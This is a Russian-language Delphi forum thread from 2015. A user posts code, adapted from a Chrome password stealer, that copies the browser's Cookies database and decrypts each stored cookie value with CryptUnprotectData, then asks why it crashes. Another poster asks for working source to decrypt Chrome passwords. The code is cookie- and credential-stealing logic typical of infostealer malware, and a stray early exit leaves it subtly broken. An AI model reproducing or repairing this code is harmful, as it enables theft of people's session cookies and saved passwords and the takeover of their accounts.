Вторник, 19.09.2017, 18:22 Приветствую вас Гость | Группа "Гости" 


[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 11
Модератор форума: xXxSh@dowxXx, Anton93, Волк-1024 
delfcode » Delphi » Вопросы по Delphi » декрипт куков хрома :3
декрипт куков хрома :3
d4rkzyДата: Понедельник, 31.08.2015, 11:37 | Сообщение # 1
Постоянный
Зарегистрирован: 15.11.2013
Группа: Пользователи
Сообщений: 135
Статус: Offline
Скопипастил код декрипта паролей хрома - проверил, все работает. Переделал под декрипт куков - в итоге получил код:

Код

function StartGetChromePass(sqlite3Dll: string; Delimitador: string): string;
var
   DB: TSQLiteDatabase;
   Tablo: TSQLiteTable;
   Sifre: string;
   Giren: DATA_BLOB;
   Cikan: DATA_BLOB;
   DataStream: TMemorystream;
   Arquivo, TempFile: string;
begin
   result := '';
   merdadll := sqlite3Dll;
   Arquivo := GetShellFolder($001C) + '\Google\Chrome\User Data\Default\Cookies'; //ou "web data" no antigo
   TempFile := MyTempFolder + inttostr(gettickcount) + '.tmp';
   if CopyFile(pchar(arquivo), pchar(TempFile), false) = false then exit;

   db := TSQLiteDatabase.Create(TempFile);

   tablo := DB.GetTable('SELECT * FROM cookies');
     exit;
   While not tablo.EOF do
   begin
     DataStream := TMemoryStream.Create;
     DataStream := tablo.FieldAsBlob(tablo.FieldIndex['encrypted_value']);
     Giren.pbData := DataStream.Memory;
     Giren.cbData := DataStream.Size;
     CryptUnProtectData(@Giren, nil,nil,nil,nil,0,@Cikan);
     SetString(sifre, PAnsiChar(Cikan.pbData), Cikan.cbData);
     Result := Result + 'Host: ' + tablo.FieldAsString(tablo.FieldIndex['host_key']) + #13#10;
     Result := Result + 'Name: ' + tablo.FieldAsString(tablo.FieldIndex['name']) + #13#10;
     Result := Result + 'Value: ' + sifre + #13#10 + #13#10;
     Tablo.Next;
   end;
   DeleteFile(pchar(TempFile));
end;


И крашицо на "tablo := DB.GetTable('SELECT * FROM cookies');" с ошибкой


Не понимаю что не так, хелпаните плзз.
 
Волк-1024Дата: Среда, 02.09.2015, 22:35 | Сообщение # 2
Авторитетный
Зарегистрирован: 24.07.2011
Группа: Модераторы
Сообщений: 467
Статус: Offline
Мне одному интересно где связь между зашифрованным паролем и, собственно, куками?

Pascal, C\C++, Assembler, Python
 
WineДата: Суббота, 05.09.2015, 07:34 | Сообщение # 3
Новичок
Зарегистрирован: 05.09.2015
Группа: Пользователи
Сообщений: 2
Статус: Offline
Можешь поделиться ссылкой на рабочий исходник декрипта паролей хрома? Благодарю
 
Anton93Дата: Суббота, 05.09.2015, 17:11 | Сообщение # 4
Продвинутый
Зарегистрирован: 06.01.2010
Группа: Модераторы
Сообщений: 320
Статус: Offline
Волк-1024, ну в куках обычно пароль хранится, правда не обязательно в зашифрованном виде

ICQ: 41896
 
d4rkzyДата: Суббота, 05.09.2015, 21:50 | Сообщение # 5
Постоянный
Зарегистрирован: 15.11.2013
Группа: Пользователи
Сообщений: 135
Статус: Offline
Народ, помогите кто нибудь:3
 
delfcode » Delphi » Вопросы по Delphi » декрипт куков хрома :3
Страница 1 из 11
Поиск:

delfcode.ru © 2008 - 2017 Хостинг от uCoz